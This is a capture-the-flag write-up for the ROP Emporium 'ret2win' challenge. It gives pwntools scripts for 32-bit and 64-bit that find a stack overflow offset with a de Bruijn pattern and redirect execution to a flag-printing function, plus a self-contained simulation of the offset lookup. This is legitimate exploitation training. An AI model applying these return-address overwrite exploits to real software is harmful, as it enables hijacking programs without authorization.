ROP Emporium

# ret2win (32-bit)

## Solution

A typical ret2text. The binary contains an unused function `ret2win`, located in the `.text` segment, that calls `system("/bin/cat flag.txt")` for us; because nothing in the normal control flow ever reaches it, such a function is sometimes called "dead code". Overwriting the saved return address with its address is enough to reach it.

## Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)

#--------Offset--------#

# Crash the binary with a de Bruijn pattern and read the value that
# overwrote the saved return address back out of the core dump.
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter(b"> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
# On i386 the pattern word is popped straight into EIP by `ret`.
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

# flat() packs the address as a 4-byte little-endian word per context.
payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter(b"> ", payload)

p.interactive()
```

## 64-bit

### Solution

The idea is essentially the same as the 32-bit case; only the register width and the way the offset is read from the core dump change.

### Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)

#--------Offset--------#

p = elf.process()
pattern = cyclic(1024)
p.sendlineafter(b"> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
# On amd64 the pattern bytes form a non-canonical address, so `ret` raises
# #GP before RIP is updated; the pattern word is still on the stack at RSP.
offset = cyclic_find(core.read(core.rsp, 4))

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

# flat() packs the address as an 8-byte little-endian word per context.
# If system() crashes on a movaps instruction, the stack is misaligned at
# the call; a single `ret` gadget before ret2win restores 16-byte alignment.
payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter(b"> ", payload)

p.interactive()
```
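Both scripts above lean on pwntools' `cyclic()` / `cyclic_find()` for the offset step, and the only real difference between the 32-bit and 64-bit versions is where the pattern is read from in the core dump. The following is an added, self-contained Python illustration (not code from this writeup or from pwntools) that builds the same de Bruijn pattern and then simulates what the core dump exposes in each case: on i386 the pattern word is popped into EIP, while on amd64 the word is a non-canonical address, so `ret` faults before RIP changes and the word has to be read from the stack at RSP. The return-address offsets 52 and 56 are constructed values for the simulation, not measurements from the challenge binaries.

```python
import functools
import string

ALPHABET = string.ascii_lowercase.encode()  # same alphabet pwntools' cyclic() uses
N = 4                                       # every 4-byte window of the pattern is unique


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes = ALPHABET, n: int = N) -> bytes:
    """Generate the de Bruijn sequence B(k, n) with the FKM algorithm:
    the concatenation, in lexicographic order, of all Lyndon words over
    `alphabet` whose length divides n."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        db(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (pwntools' cyclic(length))."""
    return de_bruijn()[:length]


def cyclic_find(value, n: int = N) -> int:
    """Offset of `value` inside the pattern. An int is packed little-endian
    to `n` bytes, mirroring how a register value is compared against the
    pattern bytes that were written into memory."""
    if isinstance(value, int):
        value = value.to_bytes(n, "little")
    return de_bruijn().find(value[:n])


def simulate_crash_32(pattern: bytes, ret_offset: int) -> int:
    """Constructed stand-in for core.eip: the 4 pattern bytes that landed on
    the saved return address are popped into EIP by `ret`."""
    return int.from_bytes(pattern[ret_offset:ret_offset + 4], "little")


def simulate_crash_64(pattern: bytes, ret_offset: int) -> bytes:
    """Constructed stand-in for core.read(core.rsp, 8): the 8-byte pattern
    word is above 0x00007fffffffffff, i.e. non-canonical, so `ret` raises #GP
    before RIP changes and RSP still points at the word."""
    word = pattern[ret_offset:ret_offset + 8]
    assert int.from_bytes(word, "little") > 0x00007FFFFFFFFFFF
    return word


def find_offset_32(eip: int) -> int:
    """i386: the crashed EIP itself locates the overwrite."""
    return cyclic_find(eip)


def find_offset_64(rsp_bytes: bytes) -> int:
    """amd64: the first 4 bytes at RSP locate the overwrite."""
    return cyclic_find(rsp_bytes[:4])


def windows_are_unique(pattern: bytes, n: int = N) -> bool:
    """Why the lookup is unambiguous: no n-byte window repeats."""
    windows = {pattern[i:i + n] for i in range(len(pattern) - n + 1)}
    return len(windows) == len(pattern) - n + 1


if __name__ == "__main__":
    pat = cyclic(1024)
    print(pat[:17])                                        # b'aaaabaaacaaadaaae'
    print(find_offset_32(simulate_crash_32(pat, 52)))      # 52 (constructed offset)
    print(find_offset_64(simulate_crash_64(pat, 56)))      # 56 (constructed offset)
    print(windows_are_unique(pat))                         # True
```

The simulation functions stand in for the core dump: in the real scripts `core.eip` and `core.read(core.rsp, 4)` supply the same values. The uniqueness check is what makes reading the offset from a single crash reliable, and it also shows why a 1024-byte pattern is comfortably within the 26^4 windows the sequence can distinguish.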